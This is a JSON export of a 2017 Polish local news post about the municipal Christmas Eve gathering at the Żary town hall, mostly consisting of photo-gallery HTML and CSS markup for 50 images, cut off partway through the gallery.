{"id":9726,"date":"2017-12-19T19:49:51","date_gmt":"2017-12-19T18:49:51","guid":{"rendered":"http:\/\/moja24.pl\/?p=9726"},"modified":"2019-04-27T02:07:21","modified_gmt":"2019-04-27T00:07:21","slug":"oplatek-zyczenia-i-swiatelko-pokoju-miejska-wigilia-w-zarach-zdjecia","status":"publish","type":"post","link":"https:\/\/moja24.pl\/index.php\/2017\/12\/19\/oplatek-zyczenia-i-swiatelko-pokoju-miejska-wigilia-w-zarach-zdjecia\/","title":{"rendered":"Op\u0142atek, \u017cyczenia i \u015bwiate\u0142ko pokoju. Miejska Wigilia w \u017barach (zdj\u0119cia)"},"content":{"rendered":"<p><strong>W niedzielne popo\u0142udnie mieszka\u0144cy \u017bar spotkali si\u0119 przed ratuszem. Wsp\u00f3lne kol\u0119dowanie, \u017cyczenia, dzielenie si\u0119 op\u0142atkiem wprowadzi\u0142o \u017caran w \u015bwi\u0105teczny nastr\u00f3j.<\/strong><\/p>\n<p>Pracownicy urz\u0119du miasta przygotowali mn\u00f3stwo atrakcji dla mieszka\u0144c\u00f3w. Szopka z \u017cywymi zwierz\u0119tami, gry i zabawy dla dzieci, warsztaty zdobienia pierniczk\u00f3w, s\u0142odki pocz\u0119stunek, to tylko niekt\u00f3re z nich. Zmarzni\u0119ci uczestnicy spotkania mogli rozgrza\u0107 si\u0119 gor\u0105cym barszczykiem i spr\u00f3bowa\u0107 pysznych wigilijnych potraw.<\/p>\n\r\n                <style type=\"text\/css\">\r\n                    \r\n                    #td_uid_1_69eddce765bd0  .td-doubleSlider-2 .td-item1 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-54-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69eddce765bd0  .td-doubleSlider-2 .td-item2 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-53-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69eddce765bd0  .td-doubleSlider-2 .td-item3 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-52-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69eddce765bd0  .td-doubleSlider-2 .td-item4 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-50-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69eddce765bd0  .td-doubleSlider-2 .td-item5 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-49-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69eddce765bd0  .td-doubleSlider-2 .td-item6 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-48-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69eddce765bd0  .td-doubleSlider-2 .td-item7 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-47-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69eddce765bd0  .td-doubleSlider-2 .td-item8 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-46-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69eddce765bd0  .td-doubleSlider-2 .td-item9 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-45-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69eddce765bd0  .td-doubleSlider-2 .td-item10 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-44-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69eddce765bd0  .td-doubleSlider-2 .td-item11 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-43-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69eddce765bd0  .td-doubleSlider-2 .td-item12 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-42-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69eddce765bd0  .td-doubleSlider-2 .td-item13 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-41-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69eddce765bd0  .td-doubleSlider-2 .td-item14 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-40-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69eddce765bd0  .td-doubleSlider-2 .td-item15 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-39-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69eddce765bd0  .td-doubleSlider-2 .td-item16 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-38-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69eddce765bd0  .td-doubleSlider-2 .td-item17 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-37-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69eddce765bd0  .td-doubleSlider-2 .td-item18 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-36-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69eddce765bd0  .td-doubleSlider-2 .td-item19 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-35-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69eddce765bd0  .td-doubleSlider-2 .td-item20 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-33-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69eddce765bd0  .td-doubleSlider-2 .td-item21 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-32-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69eddce765bd0  .td-doubleSlider-2 .td-item22 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-31-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69eddce765bd0  .td-doubleSlider-2 .td-item23 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-30-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69eddce765bd0  .td-doubleSlider-2 .td-item24 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-29-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69eddce765bd0  .td-doubleSlider-2 .td-item25 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-28-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69eddce765bd0  .td-doubleSlider-2 .td-item26 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-27-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69eddce765bd0  .td-doubleSlider-2 .td-item27 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-26-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69eddce765bd0  .td-doubleSlider-2 .td-item28 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-25-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69eddce765bd0  .td-doubleSlider-2 .td-item29 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-24-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69eddce765bd0  .td-doubleSlider-2 .td-item30 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-23-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69eddce765bd0  .td-doubleSlider-2 .td-item31 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-22-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69eddce765bd0  .td-doubleSlider-2 .td-item32 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-21-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69eddce765bd0  .td-doubleSlider-2 .td-item33 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-20-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69eddce765bd0  .td-doubleSlider-2 .td-item34 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-19-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69eddce765bd0  .td-doubleSlider-2 .td-item35 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-18-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69eddce765bd0  .td-doubleSlider-2 .td-item36 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-17-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69eddce765bd0  .td-doubleSlider-2 .td-item37 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-16-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69eddce765bd0  .td-doubleSlider-2 .td-item38 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-15-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69eddce765bd0  .td-doubleSlider-2 .td-item39 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-14-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69eddce765bd0  .td-doubleSlider-2 .td-item40 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-11-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69eddce765bd0  .td-doubleSlider-2 .td-item41 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-10-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69eddce765bd0  .td-doubleSlider-2 .td-item42 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-9-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69eddce765bd0  .td-doubleSlider-2 .td-item43 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-8-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69eddce765bd0  .td-doubleSlider-2 .td-item44 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-7-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69eddce765bd0  .td-doubleSlider-2 .td-item45 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-6-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69eddce765bd0  .td-doubleSlider-2 .td-item46 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-5-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69eddce765bd0  .td-doubleSlider-2 .td-item47 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-4-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69eddce765bd0  .td-doubleSlider-2 .td-item48 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-3-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69eddce765bd0  .td-doubleSlider-2 .td-item49 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-2-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69eddce765bd0  .td-doubleSlider-2 .td-item50 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-1-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                <\/style>\r\n\r\n                <div id=\"td_uid_1_69eddce765bd0\" class=\"td-slide-on-2-columns\">\r\n                    <div class=\"post_td_gallery\">\r\n                        <div class=\"td-gallery-slide-top\">\r\n                           <div class=\"td-gallery-title\">Miejska Wigilia w \u017barach<\/div>\r\n\r\n                            <div class=\"td-gallery-controls-wrapper\">\r\n                                <div class=\"td-gallery-slide-count\"><span class=\"td-gallery-slide-item-focus\">1<\/span> of 50<\/div>\r\n                                <div class=\"td-gallery-slide-prev-next-but\">\r\n                                    <i class = \"td-icon-left doubleSliderPrevButton\"><\/i>\r\n                                    <i class = \"td-icon-right doubleSliderNextButton\"><\/i>\r\n                                <\/div>\r\n                            <\/div>\r\n                        <\/div>\r\n\r\n                        <div class = \"td-doubleSlider-1 \">\r\n                            <div class = \"td-slider\">\r\n                                \r\n                    <div class = \"td-slide-item td-item1\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-54.jpg\" title=\"wigilia przy ratuszu 2017 (54)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-54-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-54-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-54-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-54-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-54-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-54.jpg 960w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item2\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-53.jpg\" title=\"wigilia przy ratuszu 2017 (53)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-53-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-53-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-53-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-53-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-53-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-53.jpg 960w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item3\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-52.jpg\" title=\"wigilia przy ratuszu 2017 (52)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-52-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-52-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-52-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-52-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-52-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-52.jpg 960w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item4\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-50.jpg\" title=\"wigilia przy ratuszu 2017 (50)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-50-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-50-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-50-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-50-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-50-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-50.jpg 960w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item5\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-49.jpg\" title=\"wigilia przy ratuszu 2017 (49)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-49-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-49-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-49-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-49-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-49-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-49.jpg 960w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item6\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-48.jpg\" title=\"wigilia przy ratuszu 2017 (48)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-48-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-48-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-48-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-48-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-48-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-48.jpg 960w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item7\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-47.jpg\" title=\"wigilia przy ratuszu 2017 (47)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-47-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-47-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-47-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-47-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-47-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-47.jpg 960w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item8\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-46.jpg\" title=\"wigilia przy ratuszu 2017 (46)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-46-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-46-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-46-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-46-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-46-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-46.jpg 960w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item9\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-45.jpg\" title=\"wigilia przy ratuszu 2017 (45)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-45-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-45-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-45-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-45-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-45-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-45.jpg 960w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item10\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-44.jpg\" title=\"wigilia przy ratuszu 2017 (44)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-44-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-44-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-44-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-44-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-44-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-44.jpg 960w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item11\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-43.jpg\" title=\"wigilia przy ratuszu 2017 (43)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-43-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-43-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-43-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-43-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-43-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-43.jpg 960w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item12\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/wigilia-przy-ratuszu-2017-42.jpg\" title=\"wigilia przy ratuszu 2017 (42)\"  data-caption=\"\"  